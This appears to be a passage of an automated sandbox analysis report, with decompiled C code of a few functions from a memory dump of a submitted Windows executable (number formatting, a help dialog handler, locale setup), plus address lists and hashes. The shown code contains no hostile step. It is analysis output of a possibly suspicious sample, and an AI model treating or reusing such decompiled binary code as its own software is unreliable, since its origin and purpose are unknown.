                                                                                                                              0x00417c8d
                                                                                                                              0x00417c8f
                                                                                                                              0x00417c8f
                                                                                                                              0x00417c91
                                                                                                                              0x00417c96
                                                                                                                              0x00417c9b
                                                                                                                              0x00417c9d
                                                                                                                              0x00417c9f
                                                                                                                              0x00417ca6
                                                                                                                              0x00417d4d
                                                                                                                              0x00000000
                                                                                                                              0x00417cac
                                                                                                                              0x00417cac
                                                                                                                              0x00417cb5
                                                                                                                              0x00417cb7
                                                                                                                              0x00417cbc
                                                                                                                              0x00417cde
                                                                                                                              0x00417cbe
                                                                                                                              0x00417cbe
                                                                                                                              0x00417cc3
                                                                                                                              0x00417cc3
                                                                                                                              0x00417ccb
                                                                                                                              0x00417ccd
                                                                                                                              0x00417ccf
                                                                                                                              0x00417cd8
                                                                                                                              0x00417ce6
                                                                                                                              0x00417ce6
                                                                                                                              0x00417cec
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00417cee
                                                                                                                              0x00417cf0
                                                                                                                              0x00417cf3
                                                                                                                              0x00417cf5
                                                                                                                              0x00417cf7
                                                                                                                              0x00417cf9
                                                                                                                              0x00417cfc
                                                                                                                              0x00417ce4
                                                                                                                              0x00000000
                                                                                                                              0x00417ce4
                                                                                                                              0x00417cfe
                                                                                                                              0x00000000
                                                                                                                              0x00417cfe
                                                                                                                              0x00000000
                                                                                                                              0x00417cda
                                                                                                                              0x00417cda
                                                                                                                              0x00417cda
                                                                                                                              0x00417d00
                                                                                                                              0x00417d00
                                                                                                                              0x00417d02
                                                                                                                              0x00417d04
                                                                                                                              0x00417d09
                                                                                                                              0x00417d3c
                                                                                                                              0x00417d41
                                                                                                                              0x00417d43
                                                                                                                              0x00417d45
                                                                                                                              0x00417d45
                                                                                                                              0x00417d54
                                                                                                                              0x00417d57
                                                                                                                              0x00417d5c
                                                                                                                              0x00417d60
                                                                                                                              0x00417d62
                                                                                                                              0x00417d67
                                                                                                                              0x00417d67
                                                                                                                              0x00417d6e
                                                                                                                              0x00417d70
                                                                                                                              0x00417d73
                                                                                                                              0x00417d73
                                                                                                                              0x00417d76
                                                                                                                              0x00417d79
                                                                                                                              0x00417d7c
                                                                                                                              0x00417d7f
                                                                                                                              0x00417d82
                                                                                                                              0x00417d85
                                                                                                                              0x00417d8b
                                                                                                                              0x00417d8e
                                                                                                                              0x00417d94
                                                                                                                              0x00417d9a
                                                                                                                              0x00417da0
                                                                                                                              0x00417da0
                                                                                                                              0x00417da3
                                                                                                                              0x00417d96
                                                                                                                              0x00417d96
                                                                                                                              0x00417d96
                                                                                                                              0x00417da7
                                                                                                                              0x00417daa
                                                                                                                              0x00417dae
                                                                                                                              0x00417dbc
                                                                                                                              0x00417dc0
                                                                                                                              0x00417dd3
                                                                                                                              0x00417dd6
                                                                                                                              0x00417dd7
                                                                                                                              0x00417ddc
                                                                                                                              0x00417ddd
                                                                                                                              0x00417de2
                                                                                                                              0x00417de3
                                                                                                                              0x00417dec
                                                                                                                              0x00417def
                                                                                                                              0x00417df1
                                                                                                                              0x00417dfa
                                                                                                                              0x00417dfd
                                                                                                                              0x00417e04
                                                                                                                              0x00417e05
                                                                                                                              0x00417e06
                                                                                                                              0x00417e15
                                                                                                                              0x00417e18
                                                                                                                              0x00417e1a
                                                                                                                              0x00417e28
                                                                                                                              0x00417d10
                                                                                                                              0x00417d10
                                                                                                                              0x00417d1a
                                                                                                                              0x00417d1a
                                                                                                                              0x00417d1c
                                                                                                                              0x00417d21
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00417d2b
                                                                                                                              0x00417d2e
                                                                                                                              0x00417d30
                                                                                                                              0x00417d33
                                                                                                                              0x00417d38
                                                                                                                              0x00417d18
                                                                                                                              0x00000000
                                                                                                                              0x00417d18
                                                                                                                              0x00417d3a
                                                                                                                              0x00000000
                                                                                                                              0x00417d3a
                                                                                                                              0x00417d49
                                                                                                                              0x00000000
                                                                                                                              0x00417d49
                                                                                                                              0x00417d09
                                                                                                                              0x00417cd8

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _swprintf
                                                                                                                              • String ID: %$+
                                                                                                                              • API String ID: 589789837-2626897407
                                                                                                                              • Opcode ID: c0c0274ddca220ff2c22911d26c2a032532665be393c755be3ed413d31fc3a8a
                                                                                                                              • Instruction ID: 1ae5454bad0c267e9130489639775f2188bdf39907eb6e45f32b5d9f2b390edb
                                                                                                                              • Opcode Fuzzy Hash: c0c0274ddca220ff2c22911d26c2a032532665be393c755be3ed413d31fc3a8a
                                                                                                                              • Instruction Fuzzy Hash: A65129B2A0C3449BD321DE08D8447E77BF4EF85340F144D5AE885833A1E63C49898BDB
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00417A50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 60%
                                                                                                                              			E00417A50(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				intOrPtr _t54;
				signed char _t56;
				char* _t57;
				char* _t58;
				char* _t59;
				void* _t60;
				signed long long* _t62;
				char _t68;
				intOrPtr _t69;
				signed int _t71;
				signed int _t72;
				char _t74;
				intOrPtr _t80;
				void* _t85;
				intOrPtr _t86;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t91;
				intOrPtr _t93;
				signed int _t95;
				signed long long* _t96;
				signed long long* _t97;
				signed long long* _t98;
				signed long long _t117;

				_t51 =  *0x43a6a8; // 0x2a5cd135
				 *(_t95 + 0x80) = _t51 ^ _t95;
				_t93 =  *((intOrPtr*)(_t95 + 0xa0));
				 *((intOrPtr*)(_t95 + 0x10)) =  *((intOrPtr*)(_t95 + 0x88));
				_t54 =  *((intOrPtr*)(_t93 + 0x14));
				 *((intOrPtr*)(_t95 + 0x14)) = __ecx;
				if(_t54 <= 0 && ( *(_t93 + 0x10) & 0x00002000) == 0) {
					_t54 = 6;
				}
				_t88 = _t54;
				_t80 = 0x24;
				if(_t88 <= 0x24) {
					_t80 = _t88;
				}
				_t71 =  *(_t93 + 0x10);
				_t56 = _t71 & 0x00003000;
				_t89 = _t88 - _t80;
				_t68 = 0;
				_t85 = 0;
				if(_t56 != 0x2000) {
					_t117 =  *(_t95 + 0xb0);
					goto L27;
				} else {
					asm("fldz");
					asm("fcom st0, st1");
					asm("fnstsw ax");
					if((_t56 & 0x00000005) != 0) {
						 *((char*)(_t95 + 0x13)) = 0;
					} else {
						 *((char*)(_t95 + 0x13)) = 1;
						asm("fchs");
					}
					asm("fcom st0, st1");
					asm("fnstsw ax");
					_t117 =  *0x433798;
					if((_t56 & 0x00000041) != 0) {
						while(1) {
							__eflags = _t68 - 0x1388;
							if(__eflags >= 0) {
								goto L9;
							}
							_t117 = _t117 / st0;
							_t68 = _t68 + 0xa;
							asm("fxch st0, st1");
							asm("fcom st0, st2");
							asm("fnstsw ax");
							__eflags = _t56 & 0x00000041;
							if(__eflags != 0) {
								asm("fxch st0, st1");
								continue;
							}
							st0 = _t117;
							goto L15;
						}
						goto L9;
					} else {
						L9:
						st1 = _t117;
						L15:
						asm("fxch st0, st2");
						asm("fcomp st0, st1");
						asm("fnstsw ax");
						if((_t56 & 0x00000005) != 0 || _t89 < 0xa) {
							L23:
							st1 = _t117;
							if( *((char*)(_t95 + 0x13)) != 0) {
								asm("fchs");
							}
							L27:
							 *((char*)(_t95 + 0x1c)) = 0x25;
							_t57 = _t95 + 0x1d;
							if((_t71 & 0x00000020) != 0) {
								 *((char*)(_t95 + 0x1d)) = 0x2b;
								_t57 = _t95 + 0x1e;
							}
							if((_t71 & 0x00000010) != 0) {
								 *_t57 = 0x23;
								_t57 = _t57 + 1;
							}
							 *_t57 = 0x2e;
							_t58 = _t57 + 1;
							 *_t58 = 0x2a;
							_t72 = _t71 & 0x00003000;
							_t59 = _t58 + 1;
							_t115 = _t72 - 0x2000;
							if(_t72 != 0x2000) {
								__eflags = _t72 - 0x1000;
								_t35 = _t72 != 0x1000;
								__eflags = _t35;
								_t74 = (_t72 & 0xffffff00 | _t35) + (_t72 & 0xffffff00 | _t35) + 0x65;
							} else {
								_t74 = 0x66;
							}
							_t96 = _t95 - 8;
							 *_t96 = _t117;
							 *_t59 = _t74;
							 *((char*)(_t59 + 1)) = 0;
							_t60 = E0041BFA6( &(_t96[6]), 0x6c,  &(_t96[5]), _t80);
							_t97 =  &(_t96[3]);
							_push(_t60);
							_push(_t89);
							_push(_t85);
							_push(_t68);
							_push( &(_t97[6]));
							_push(_t96[0x18]);
							_t98 = _t97 - 0xc;
							_t62 = _t98;
							 *_t62 = _t96[0x16];
							_t62[0] = _t97[0x17];
							_t62[1] = _t98[0x19];
							_push(_t97[4]);
							_push(_t98[7]);
							E004168A0(_t115);
							_pop(_t86);
							_pop(_t91);
							_t69 = _t93;
							return E0041B3F9(_t97[4], _t69, _t98[0x18] ^  &(_t98[6]), _t98[0x19], _t86, _t91);
						} else {
							_t117 =  *0x433790;
							while(1) {
								asm("fcom st0, st1");
								asm("fnstsw ax");
								if((_t56 & 0x00000001) != 0 || _t85 >= 0x1388) {
									break;
								}
								_t89 = _t89 - 0xa;
								asm("fxch st0, st1");
								_t85 = _t85 + 0xa;
								_t117 = _t117 * st2;
								if(_t89 >= 0xa) {
									asm("fxch st0, st1");
									continue;
								}
								st1 = _t117;
								goto L23;
							}
							st0 = _t117;
							goto L23;
						}
					}
				}
			}































                                                                                                                              0x00417a56
                                                                                                                              0x00417a5d
                                                                                                                              0x00417a6d
                                                                                                                              0x00417a74
                                                                                                                              0x00417a78
                                                                                                                              0x00417a7f
                                                                                                                              0x00417a83
                                                                                                                              0x00417a8e
                                                                                                                              0x00417a8e
                                                                                                                              0x00417a93
                                                                                                                              0x00417a98
                                                                                                                              0x00417a9d
                                                                                                                              0x00417a9f
                                                                                                                              0x00417a9f
                                                                                                                              0x00417aa1
                                                                                                                              0x00417aa6
                                                                                                                              0x00417aab
                                                                                                                              0x00417aad
                                                                                                                              0x00417aaf
                                                                                                                              0x00417ab6
                                                                                                                              0x00417b5d
                                                                                                                              0x00000000
                                                                                                                              0x00417abc
                                                                                                                              0x00417abc
                                                                                                                              0x00417ac5
                                                                                                                              0x00417ac7
                                                                                                                              0x00417acc
                                                                                                                              0x00417aee
                                                                                                                              0x00417ace
                                                                                                                              0x00417ace
                                                                                                                              0x00417ad3
                                                                                                                              0x00417ad3
                                                                                                                              0x00417adb
                                                                                                                              0x00417add
                                                                                                                              0x00417adf
                                                                                                                              0x00417ae8
                                                                                                                              0x00417af6
                                                                                                                              0x00417af6
                                                                                                                              0x00417afc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00417afe
                                                                                                                              0x00417b00
                                                                                                                              0x00417b03
                                                                                                                              0x00417b05
                                                                                                                              0x00417b07
                                                                                                                              0x00417b09
                                                                                                                              0x00417b0c
                                                                                                                              0x00417af4
                                                                                                                              0x00000000
                                                                                                                              0x00417af4
                                                                                                                              0x00417b0e
                                                                                                                              0x00000000
                                                                                                                              0x00417b0e
                                                                                                                              0x00000000
                                                                                                                              0x00417aea
                                                                                                                              0x00417aea
                                                                                                                              0x00417aea
                                                                                                                              0x00417b10
                                                                                                                              0x00417b10
                                                                                                                              0x00417b12
                                                                                                                              0x00417b14
                                                                                                                              0x00417b19
                                                                                                                              0x00417b4c
                                                                                                                              0x00417b51
                                                                                                                              0x00417b53
                                                                                                                              0x00417b55
                                                                                                                              0x00417b55
                                                                                                                              0x00417b64
                                                                                                                              0x00417b67
                                                                                                                              0x00417b6c
                                                                                                                              0x00417b70
                                                                                                                              0x00417b72
                                                                                                                              0x00417b77
                                                                                                                              0x00417b77
                                                                                                                              0x00417b7e
                                                                                                                              0x00417b80
                                                                                                                              0x00417b83
                                                                                                                              0x00417b83
                                                                                                                              0x00417b86
                                                                                                                              0x00417b89
                                                                                                                              0x00417b8c
                                                                                                                              0x00417b8f
                                                                                                                              0x00417b95
                                                                                                                              0x00417b98
                                                                                                                              0x00417b9e
                                                                                                                              0x00417ba4
                                                                                                                              0x00417baa
                                                                                                                              0x00417baa
                                                                                                                              0x00417bad
                                                                                                                              0x00417ba0
                                                                                                                              0x00417ba0
                                                                                                                              0x00417ba0
                                                                                                                              0x00417bb1
                                                                                                                              0x00417bb4
                                                                                                                              0x00417bb8
                                                                                                                              0x00417bc6
                                                                                                                              0x00417bca
                                                                                                                              0x00417bdd
                                                                                                                              0x00417be0
                                                                                                                              0x00417be1
                                                                                                                              0x00417be6
                                                                                                                              0x00417be7
                                                                                                                              0x00417bec
                                                                                                                              0x00417bed
                                                                                                                              0x00417bf6
                                                                                                                              0x00417bf9
                                                                                                                              0x00417bfb
                                                                                                                              0x00417c04
                                                                                                                              0x00417c07
                                                                                                                              0x00417c0e
                                                                                                                              0x00417c0f
                                                                                                                              0x00417c10
                                                                                                                              0x00417c1f
                                                                                                                              0x00417c22
                                                                                                                              0x00417c24
                                                                                                                              0x00417c32
                                                                                                                              0x00417b20
                                                                                                                              0x00417b20
                                                                                                                              0x00417b2a
                                                                                                                              0x00417b2a
                                                                                                                              0x00417b2c
                                                                                                                              0x00417b31
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00417b3b
                                                                                                                              0x00417b3e
                                                                                                                              0x00417b40
                                                                                                                              0x00417b43
                                                                                                                              0x00417b48
                                                                                                                              0x00417b28
                                                                                                                              0x00000000
                                                                                                                              0x00417b28
                                                                                                                              0x00417b4a
                                                                                                                              0x00000000
                                                                                                                              0x00417b4a
                                                                                                                              0x00417b59
                                                                                                                              0x00000000
                                                                                                                              0x00417b59
                                                                                                                              0x00417b19
                                                                                                                              0x00417ae8

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _swprintf
                                                                                                                              • String ID: %$+
                                                                                                                              • API String ID: 589789837-2626897407
                                                                                                                              • Opcode ID: 5625d44db6b6ff7d34a14a49d6ca7025e70e951ad4bd9e5215800fec38404004
                                                                                                                              • Instruction ID: f71ac3d51ce8ca93d0908d6ca6b00c8583d691593cf493f3215c0ef5cdfc022a
                                                                                                                              • Opcode Fuzzy Hash: 5625d44db6b6ff7d34a14a49d6ca7025e70e951ad4bd9e5215800fec38404004
                                                                                                                              • Instruction Fuzzy Hash: 17514972A0C3405BD721DF08C844BDB7BF4EB85784F14495EE98583391E73D99898B9B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040D210 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 137COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E0040D210(intOrPtr __ebx, intOrPtr __edi, void* __ebp, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				int _v4;
				char _v12;
				signed int _v16;
				char _v44;
				char _v48;
				char _v72;
				char _v76;
				void* __esi;
				signed int _t25;
				signed int _t27;
				intOrPtr _t30;
				signed int _t31;
				signed int _t32;
				intOrPtr _t33;
				intOrPtr _t42;
				intOrPtr _t43;
				char* _t49;
				intOrPtr _t51;
				char* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				struct HWND__* _t57;
				intOrPtr _t58;
				void* _t60;
				signed int _t61;
				void* _t63;

				_t55 = __edi;
				_t42 = __ebx;
				_push(0xffffffff);
				_push(E004307E0);
				_push( *[fs:0x0]);
				_t61 = _t60 - 0x40;
				_t25 =  *0x43a6a8; // 0x2a5cd135
				_v16 = _t25 ^ _t61;
				_t27 =  *0x43a6a8; // 0x2a5cd135
				_push(_t27 ^ _t61);
				 *[fs:0x0] =  &_v12;
				_t43 = _a8;
				_t63 = _t43 - 0x110;
				_t57 = _a4;
				_t30 = _a16;
				if(_t63 > 0) {
					__eflags = _t43 - 0x111;
					if(_t43 == 0x111) {
						_t31 = _a12 & 0x0000ffff;
						__eflags = _t31 - 0x401;
						if(__eflags > 0) {
							_t32 = _t31 - 0x402;
							__eflags = _t32 - 7;
							if(_t32 > 7) {
								L30:
								_t33 = 1;
								L31:
								 *[fs:0x0] = _v12;
								_pop(_t58);
								return E0041B3F9(_t33, _t42, _v16 ^ _t61, _t54, _t55, _t58);
							}
							switch( *((intOrPtr*)(_t32 * 4 +  &M0040D418))) {
								case 0:
									_t48 =  *0x43bde4;
									__eflags =  *0x43bde4;
									if(__eflags != 0) {
										E0040C150(_t48, __eflags, 0x402);
									}
									goto L30;
								case 1:
									goto L30;
								case 2:
									__ecx =  *0x43bde4;
									__eflags = __ecx;
									if(__eflags != 0) {
										__eax = E0040C260(__ecx, __ebp, __eflags, 0x405);
									}
									goto L30;
								case 3:
									__ecx =  *0x43bde4;
									__eflags = __ecx;
									if(__eflags != 0) {
										__eax = E0040C260(__ecx, __ebp, __eflags, 0x408);
									}
									goto L30;
								case 4:
									__eax =  *0x43bde4;
									__eflags = __eax;
									if(__eax != 0) {
										__eax =  *((intOrPtr*)(__eax + 0x804));
										_push("\\");
										__eflags = __eax;
										__ecx =  &_v72;
										__eax = E00408450(__ebx, __edx, __ebp,  &_v72);
										__edx =  &_v44;
										_v4 = 0;
										__eax = E00408450(__ebx, __edx, __ebp, __edx);
										__ecx =  &_v72;
										_v4 = 2;
										__eax = E00404600( &_v72);
										__esp = __esp - 0x1c;
										__eax =  &_v44;
										__ecx = __esp;
										_v76 = __esp;
										E00401E60(__esp,  &_v44) = E00418E00(__edx, __ebp, __esi, L"help\\conv_excluding_computers.html", __eax, L"hnv", __eax);
										__ecx =  &_v48;
										__eax = E00404600(__ecx);
									}
									goto L30;
							}
						}
						if(__eflags == 0) {
							_t49 =  *0x43bde4; // 0x0
							__eflags = _t49;
							if(__eflags != 0) {
								E0040C150(_t49, __eflags, 0x401);
							}
							goto L30;
						}
						__eflags = _t31 != 2;
						if(_t31 != 2) {
							goto L30;
						}
						L17:
						EndDialog(_t57, 0);
						goto L30;
					}
					L13:
					_t33 = 0;
					goto L31;
				}
				if(_t63 == 0) {
					 *0x43bde4 = _t30;
					E0040CE80(_t30, _t54, __eflags, _t57);
					goto L30;
				}
				if(_t43 == 0x10) {
					goto L17;
				}
				if(_t43 != 0x4e) {
					goto L13;
				}
				_t51 =  *((intOrPtr*)(_t30 + 8));
				if(_t51 != 0xfffffffe) {
					__eflags = _t51 - 0xfffffe64;
					if(_t51 != 0xfffffe64) {
						goto L13;
					}
					__eflags =  *((short*)(_t30 + 0xc)) - 0x20;
					if( *((short*)(_t30 + 0xc)) != 0x20) {
						goto L13;
					}
					_t52 =  *0x43bde4; // 0x0
					__eflags = _t52;
					if(_t52 == 0) {
						goto L13;
					} else {
						_t54 =  &_v76;
						E0040C820(_t52, __ebp, _t30,  &_v76);
						_t33 = 0;
						goto L31;
					}
				} else {
					_t53 =  *0x43bde4; // 0x0
					if(_t53 != 0) {
						_t54 =  &_v76;
						E0040C5D0(_t53, _t30,  &_v76);
					}
					goto L30;
				}
			}





























                                                                                                                              0x0040d210
                                                                                                                              0x0040d210
                                                                                                                              0x0040d210
                                                                                                                              0x0040d212
                                                                                                                              0x0040d21d
                                                                                                                              0x0040d21e
                                                                                                                              0x0040d221
                                                                                                                              0x0040d228
                                                                                                                              0x0040d22d
                                                                                                                              0x0040d234
                                                                                                                              0x0040d239
                                                                                                                              0x0040d23f
                                                                                                                              0x0040d243
                                                                                                                              0x0040d249
                                                                                                                              0x0040d24d
                                                                                                                              0x0040d251
                                                                                                                              0x0040d2c6
                                                                                                                              0x0040d2cc
                                                                                                                              0x0040d2d5
                                                                                                                              0x0040d2da
                                                                                                                              0x0040d2df
                                                                                                                              0x0040d317
                                                                                                                              0x0040d31c
                                                                                                                              0x0040d31f
                                                                                                                              0x0040d3f5
                                                                                                                              0x0040d3f5
                                                                                                                              0x0040d3fa
                                                                                                                              0x0040d3fe
                                                                                                                              0x0040d406
                                                                                                                              0x0040d415
                                                                                                                              0x0040d415
                                                                                                                              0x0040d325
                                                                                                                              0x00000000
                                                                                                                              0x0040d32c
                                                                                                                              0x0040d332
                                                                                                                              0x0040d334
                                                                                                                              0x0040d33f
                                                                                                                              0x0040d33f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040d349
                                                                                                                              0x0040d34f
                                                                                                                              0x0040d351
                                                                                                                              0x0040d35c
                                                                                                                              0x0040d35c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040d366
                                                                                                                              0x0040d36c
                                                                                                                              0x0040d36e
                                                                                                                              0x0040d379
                                                                                                                              0x0040d379
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040d380
                                                                                                                              0x0040d385
                                                                                                                              0x0040d387
                                                                                                                              0x0040d389
                                                                                                                              0x0040d38f
                                                                                                                              0x0040d394
                                                                                                                              0x0040d398
                                                                                                                              0x0040d39d
                                                                                                                              0x0040d3a8
                                                                                                                              0x0040d3ad
                                                                                                                              0x0040d3b5
                                                                                                                              0x0040d3bd
                                                                                                                              0x0040d3c1
                                                                                                                              0x0040d3c6
                                                                                                                              0x0040d3d0
                                                                                                                              0x0040d3d3
                                                                                                                              0x0040d3d7
                                                                                                                              0x0040d3d9
                                                                                                                              0x0040d3e4
                                                                                                                              0x0040d3ec
                                                                                                                              0x0040d3f0
                                                                                                                              0x0040d3f0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040d325
                                                                                                                              0x0040d2e1
                                                                                                                              0x0040d2fa
                                                                                                                              0x0040d300
                                                                                                                              0x0040d302
                                                                                                                              0x0040d30d
                                                                                                                              0x0040d30d
                                                                                                                              0x00000000
                                                                                                                              0x0040d302
                                                                                                                              0x0040d2e3
                                                                                                                              0x0040d2e6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040d2ec
                                                                                                                              0x0040d2ef
                                                                                                                              0x00000000
                                                                                                                              0x0040d2ef
                                                                                                                              0x0040d2ce
                                                                                                                              0x0040d2ce
                                                                                                                              0x00000000
                                                                                                                              0x0040d2ce
                                                                                                                              0x0040d253
                                                                                                                              0x0040d2b7
                                                                                                                              0x0040d2bc
                                                                                                                              0x00000000
                                                                                                                              0x0040d2bc
                                                                                                                              0x0040d258
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040d261
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040d263
                                                                                                                              0x0040d269
                                                                                                                              0x0040d289
                                                                                                                              0x0040d28f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040d291
                                                                                                                              0x0040d296
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040d298
                                                                                                                              0x0040d29e
                                                                                                                              0x0040d2a0
                                                                                                                              0x00000000
                                                                                                                              0x0040d2a2
                                                                                                                              0x0040d2a2
                                                                                                                              0x0040d2a8
                                                                                                                              0x0040d2ad
                                                                                                                              0x00000000
                                                                                                                              0x0040d2ad
                                                                                                                              0x0040d26b
                                                                                                                              0x0040d26b
                                                                                                                              0x0040d273
                                                                                                                              0x0040d279
                                                                                                                              0x0040d27f
                                                                                                                              0x0040d27f
                                                                                                                              0x00000000
                                                                                                                              0x0040d273

                                                                                                                              APIs
                                                                                                                              • EndDialog.USER32(?,00000000), ref: 0040D2EF
                                                                                                                                • Part of subcall function 0040C5D0: GetMessagePos.USER32 ref: 0040C6D6
                                                                                                                                • Part of subcall function 0040C5D0: ScreenToClient.USER32 ref: 0040C6F0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientDialogMessageScreen
                                                                                                                              • String ID: help\conv_excluding_computers.html$hnv
                                                                                                                              • API String ID: 2669707657-2836807802
                                                                                                                              • Opcode ID: a006f1326a36348db867c506ffff26890e4c1415893b480f6a24b1279eb7ab22
                                                                                                                              • Instruction ID: 5c68f8695fdd92038ff2bc96520851911d23345d43b3d7786eaa3e74b08e1be9
                                                                                                                              • Opcode Fuzzy Hash: a006f1326a36348db867c506ffff26890e4c1415893b480f6a24b1279eb7ab22
                                                                                                                              • Instruction Fuzzy Hash: 2F41C474A043049BD718DBA4C891B7F73A4EB84714F04093FFA02A26D1DB7CD8489A9F
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00415600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 80%
                                                                                                                              			E00415600(char __ecx, intOrPtr __edx) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				void* __edi;
				void* __esi;
				signed int _t44;
				char _t51;
				char _t60;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr _t76;
				char* _t77;
				int _t79;
				void* _t83;
				char _t87;
				signed int _t89;
				void* _t90;
				void* _t96;

				_t76 = __edx;
				_push(0xffffffff);
				_push(E00430FF0);
				_push( *[fs:0x0]);
				_push(_t83);
				_t44 =  *0x43a6a8; // 0x2a5cd135
				_push(_t44 ^ _t89);
				 *[fs:0x0] =  &_v16;
				_v20 = _t90 - 0x20;
				_t87 = __ecx;
				_v32 = __ecx;
				_t65 = E0041BE84(_t83, __ecx, _t96);
				 *((intOrPtr*)(_t87 + 8)) = 0;
				 *((intOrPtr*)(_t87 + 0x10)) = 0;
				 *((intOrPtr*)(_t87 + 0x14)) = 0;
				_v8 = 0;
				E0041A0A7();
				_push( &_v48);
				_push(0);
				 *((intOrPtr*)(_t87 + 8)) = E004155B0( *((intOrPtr*)(_t65 + 8)));
				_t51 = E0041A0A7();
				_v36 = _t76;
				_t77 =  &_v40;
				_v40 = _t51;
				 *((intOrPtr*)(_t87 + 0x10)) = E004153C0("false", 0, _t77);
				_v40 = E0041A0A7();
				_v36 = _t77;
				 *((intOrPtr*)(_t87 + 0x14)) = E004153C0("true", 0,  &_v40);
				_v40 = E0041A0A7();
				_v36 = _t77;
				_v24 =  *((intOrPtr*)( *_t65));
				_t79 =  &_v24;
				_v28 = 0;
				_v32 = 0;
				E0041A778( &_v28, _t79, 1,  &_v32,  &_v40);
				 *((short*)(_t87 + 0xc)) = _v28;
				_t60 = E0041A0A7();
				_v44 = _t79;
				_v48 = _t60;
				_v24 =  *((intOrPtr*)( *((intOrPtr*)(_t65 + 4))));
				_v28 = 0;
				_v32 = 0;
				_t63 = E0041A778( &_v28,  &_v24, 1,  &_v32,  &_v48);
				 *((short*)(_t87 + 0xe)) = _v28;
				 *[fs:0x0] = _v16;
				return _t63;
			}




























                                                                                                                              0x00415600
                                                                                                                              0x00415603
                                                                                                                              0x00415605
                                                                                                                              0x00415610
                                                                                                                              0x00415616
                                                                                                                              0x00415617
                                                                                                                              0x0041561e
                                                                                                                              0x00415622
                                                                                                                              0x00415628
                                                                                                                              0x0041562b
                                                                                                                              0x0041562d
                                                                                                                              0x00415637
                                                                                                                              0x00415639
                                                                                                                              0x0041563c
                                                                                                                              0x0041563f
                                                                                                                              0x00415642
                                                                                                                              0x00415645
                                                                                                                              0x00415650
                                                                                                                              0x00415651
                                                                                                                              0x0041565b
                                                                                                                              0x0041565e
                                                                                                                              0x00415663
                                                                                                                              0x00415666
